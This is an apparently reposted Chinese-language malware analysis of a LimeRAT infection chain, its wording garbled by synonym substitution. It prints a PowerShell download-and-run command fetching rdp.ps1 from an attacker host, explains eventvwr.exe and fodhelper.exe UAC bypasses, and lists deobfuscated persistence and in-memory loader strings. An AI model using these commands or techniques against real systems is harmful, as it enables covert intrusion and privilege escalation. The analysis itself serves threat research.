LimeRAT在野外传达

访客5年前黑客工具882

几天前,Cybaze-Yoroi ZLab安全团队遇到了一类风趣的感染链,它运用多种杂乱技能,能够绕过传统安全防御机制并躲藏其payload,对方针用户形成严重威胁。
整个感染链始于一个LNK文件,运用LNK文件进行进犯是APT安排常常运用的技能之一,因而咱们决议对这些歹意样本进行更深化的研讨,在研讨进程中,咱们还发现了另一个早被用滥的开源项目,许多时分, *** 犯罪分子会在其间植入歹意软件。

技能剖析
感染链的来源是一个简略的LNK文件,旨在经过以下指令从长途方位下载并运转名为“rdp.ps1”的PowerShell文件:
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy Bypass -Windo 1 $wm=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWVY'));sal g $wm;$IF=((New-Object Net.WebClient)).DownloadString('https://hacks4all[.net/rdp.ps1');g $I
检索到的Powershell脚本是整个感染链的dropper。

此Powershell脚本首要运用“Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version”指令检索方针核算机上装置的Windows操作系统的版别。接着依据回来的值,运用一些相应的权限提高缝隙,以绕过UAC(用户帐户操控)功用——这是自Windows Vista起引进的一种安全机制,能够防止未经授权的系统配置更改。脚本的首要方针就是在版别低于8.1的Windows中,运用EventViewer进程上的规划缺点来履行具有更高特权的指令。
对此缝隙的运用进程是十分简单的:歹意软件能够拜访注册表项“HKCU: Software Classes mscfile shell open command”,并在此处刺进指令,经过强制履行“eventvwr.exe”进程来运转其payload,因为安全缝隙,能够以更高权限运转该进程。


图1:查看方针Windows版别并为eventvwr.exe进程缝隙运用做准备
第二个缝隙则涉及到Windows 10操作系统:是FODhelper进程中的一个缝隙。此缝隙运用的原理与前一个相似,但拜访的注册表项是“HKCU: Software Classes ms-settings Shell Open command”,而受进犯的进程则是“fodhelper.exe”。


图2:查看方针Windows版别并为fodhelper.exe进程缝隙运用做准备
之后运转Powershell payload,payload在解码后会调用额定的JavaScript代码。这个脚本的主体包括一个嵌入其他子函数的专一匿名函数和一个很大的含糊变量。

图3:以Base64格局编码的payload,与自定义子程序混杂

图4:子程序去混杂后的部分代码
它的payload是一个参数化的Powershell脚本,意图是将终究payload装置到用户注册表hive中,然后完毕感染链。
[
 "Wscript.Shell",
 "scriptfullname",
 "scriptname",
 "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command ",
 "%",
 "ExpandEnvironmentStrings",
 "Temp",
 "",
 "fromCharCode",
 "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('Temp')+'",
 "',[System.IO.File]::ReadAllText('",
 "'));wscript '",
 "'",
 "Run",
 "Quit",
 "New-ItemProperty -Path 'HKCU:SoftwareMicrosoftWindowsCurrentVersionRun' -name 'FileName' -value '",
 "' -PropertyType String -Force;",
 "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'",
 "'))",
 
 " ##### FINAL PAYLOAD ##### "
 "HKCUSOFTWAREMicrosoft\Winkey",
 "Scripting.FileSystemObject",
 "REG_SZ",
 "regwrite",
 "$_b = (get-itemproperty -path 'HKCU:SOFTWAREMicrosoft' -name 'Winkey').Winkey;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"

[1] [2]  黑客接单网

相关文章

运用Python检测并绕过Web应用程序防火墙

Web运用防火墙一般会被布置在Web客户端与Web服务器之间,以过滤来自服务器的歹意流量。而作为一名浸透测验人员,想要更好的打破方针体系,就有必要要了解方针体系的WAF规矩。现在,许多WAF都是根据签...

如何在AIX和Power架构上运行Metasploit Framework-黑客接单平台

本文将向咱们介绍如安在AIX和Power架构上运转Metasploit结构,这关于那些想要测验在这些架构上运转Metasploit的人可能会有所协助(至少现在我还没有在网上发现关于这方面的教程内容)。...

跨站恳求假造CSRF防护办法

 CSRF(Cross-site request forgery跨站恳求假造,也被称成为“one click attack”或许session riding,一般缩写为CSRF或许XSRF,是一种对网...

一次射中可疑要挟情报的剖析探究

由于最近一段时刻里”驱动人生”这个病毒还挺抢手,最近发现经过一些安全厂商的设备发现内网里边有许多的主机都中了这个病毒瞬间吓哭了。后续经过对主机进行查看,竟然没有发现什么问题,后续发现是安全设备命中了一...

黑客入侵又出新招!丹麦科学研究精英团队探索与发现:不连接网络

黑客入侵又出新招!丹麦科学研究精英团队探索与发现:不连接网络

针对网络黑客而言,沒有她们没法做到,唯有你意想不到。   就算不连接网络,网络黑客运用散热风扇也可以盗取你的数据信息? 前不久,非洲的一个科学研究精...